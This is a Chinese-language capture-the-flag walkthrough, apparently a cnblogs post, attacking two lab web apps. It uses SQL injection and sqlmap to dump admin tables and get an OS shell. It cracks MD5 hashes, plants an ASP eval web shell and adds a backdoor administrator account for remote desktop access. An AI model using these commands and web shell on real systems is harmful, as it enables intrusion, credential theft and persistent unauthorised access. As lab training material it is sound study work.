靶场杰科、EIMS寻找flag

杰科

在以下栏目我们都可以去尝试一下手动注入:

如:http://192.168.7.165/service.php?listid=5
可以看到:
http://192.168.7.165/service.php?listid=5' 页面异常
http://192.168.7.165/service.php?listid=5 and 1=1 页面正常
http://192.168.7.165/service.php?listid=5 and 1=2 页面异常
从而判断该地方一定存在注入,且为布尔盲注
可以配合burp一步步爆数据

但是为了提高效率我们可以使用sqlmap(毕竟是靶场):
sqlmap -u http://192.168.7.165/service.php?listid=5 --current-db 爆出当前数据库名


为510cms

  • 爆表
    sqlmap -u http://192.168.7.165/service.php?listid=5 -D 510cms --tables

  • 爆数据
    拿510_admin的数据:
    sqlmap -u http://192.168.7.165/service.php?listid=5 -D 510cms -T 510_admin --dump

    可以看到admin账户

将8dbdf8221fcf4bd6ac5a48317baa948c进行md5解密(可以通过somd5.com免费在线解密),解密结果如下:

密码为adminlwphp

通过御剑扫描:

我们得到后台登陆页面:http://192.168.7.165/admin/login.php
(注意,登陆的时候验证码区分大小写)

登陆成功:

我们可以看到物理路径:C:/WWW/

判断当前用户是否为管理员:sqlmap.py -u url --is-dba

尝试获取os-shell:
sqlmap -u http://192.168.7.165/service.php?listid=5 --os-shell

直接获取成功

同时可以看到该页面有这么一句话:the file stager has been successfully uploaded on 'C:/WWW/' - http://192.168.7.165:80/tmpufyep.php
我们打开http://192.168.7.165:80/tmpufyep.php,是一个上传页面,我们可以直接上传shell到网站目录,使用菜刀连接

whoami查看用户身份,为系统用户
net user查看有哪些用户

接下来添加用户和组:
添加用户sillage,密码123456:

net user sillage 123456 /add

添加到管理组:

net localgroup administrators sillage /add

win+r,mstsc,输入ip进行远程连接

查找flag:
后台登陆页面审查源码有一个flag
主机里面有四个flag

EIMS

御剑扫描目录:
发现后台登陆页面:http://192.168.7.158/admin/login.asp

利用sqlmap进行注入时:
1、舍弃参数
如:
http://192.168.7.158/Down.asp?SortID=2&ItemID=35提示SortID参数不能注入,直接舍弃
利用一下链接进行sqlmap的爆破:http://192.168.7.158/Down.asp?ItemID=35
2、更换页面链接
如:
查看数据库Test_EIMS时,发现里面存在一个eims_flag的表,用此链接http://192.168.7.158/Job.asp?ItemID=14跑出来eims_flag为空表
但是其他的链接几乎都可以跑出该表的flag,而且用该链接跑出来的表为:

在倒数第六个表其他链接跑出来都为eims_User,所以在实操中还是要多尝试一些链接。

查看所有数据库:sqlmap.py -u http://192.168.7.158/Job.asp?ItemID=14 --dbs(--current-db查看当前数据库)

当前数据库:Test_EIMS
查看有一个eims_User表
sqlmap.py -u http://192.168.7.158/Case.asp?ItemID=52 -D Test_EIMS -T eims_User dump
查看里面一个账户为root,密码为md5加密,通过在线解密:
https://www.somd5.com/ ,发现密码为admin1234,登陆后台可以通过/Admin/Upfile进行文件管理,看到网站各个路径下的的文件:

判断当前用户是否为管理员:
sqlmap.py -u http://192.168.7.158/Job.asp?ItemID=14 --is-dba
获取shell:
sqlmap.py -u http://192.168.7.158/Job.asp?ItemID=14 --os-shell
写入一句话:
echo "<%eval request("aa")%>" > c:\inetpub\wwwroot\sillage.asp
添加用户:

net user sillage 123456 /add

添加到管理组:

net localgroup administrators sillage /add

远程连接桌面,win+r,输入mstsc,输入ip,然后输入账户密码进行连接

登陆后台审查源码有一个flag
数据库emis_flag表里有一个flag
主机里面有三个flag:

作者:
除特别声明为原创博文外,均可转载,也欢迎转载,未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利,谢谢您的配合。
原文地址:https://www.cnblogs.com/sillage/p/13600113.html